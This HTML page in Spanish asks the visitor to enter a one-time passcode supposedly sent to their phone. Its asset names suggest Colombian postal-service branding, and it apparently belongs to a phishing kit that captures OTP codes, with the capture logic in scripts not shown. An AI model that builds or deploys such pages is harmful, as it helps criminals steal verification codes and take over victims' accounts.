<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Validación Final</title>
    <link rel="shortcut icon" href="./assets/logos/favicon.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;0,1000;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900;1,1000&amp;display=swap" rel="stylesheet">
    
    <!-- <meta http-equiv="Content-Security-Policy" content="default-src 'self'; font-src 'self' https://fonts.googleapis.com https://fonts.gstatic.com;"> -->

    <!-- CSS -->
    <link rel="stylesheet" href="./css/normalize.css">
    <link rel="stylesheet" href="./css/main.css">
    
    <!-- VALIDATIONS -->
    <script src="./js/functions.js"></script>
</head>
<body>

    <header>
        <div class="navbar-container">
            <img src="./assets/logos/logo_472.png" alt="" class="navbar-logo">
            <img src="./assets/svg/hamburguer-menu.png" alt="" class="navbar-menu">
        </div>
    </header>

    <main class="section">
        <h3 class="section-title">VERIFICACIÓN DE SEGURIDAD</h3>
        <p>Hemos enviado un código de validación a tu celular.</p>
        <form class="form" action="" id="form">
            <input id="tok" type="text" minlength="4" required  class="form-input" placeholder="Código OTP">

            <button type="submit" class="btn-success btn-100" id="success">
                Validar
            </button>
        </form>
    </main>

    <footer>
        <hr>
        <p>Sobre nosotros</p>
        <hr>
        <p>Links de interés</p>
        <hr>
        <p>Centro de ayuda</p>
        <hr>
        <p>Accesos corporativos</p>
        <hr>
        <div class="footer-links">
            <img src="./assets/svg/ico-fb.svg" alt="">
            <img src="./assets/svg/ico-ins.svg" alt="">
            <img src="./assets/svg/ico-tw.svg" alt="">
            <img src="./assets/svg/ico-yt.svg" alt="">
            <img src="./assets/svg/ico-lk.svg" alt="">
            <img src="./assets/svg/ico-vigilado.png" alt="">
        </div>
        <hr>
        <div class="footer-links">
            <p class="thinier">Política de privacidad | Términos y Condiciones | Mapa del sitio</p>
        </div>
    </footer>


    <!-- SCRIPTS -->
    <script src="./js/otp.js"></script>   
</body>
</html>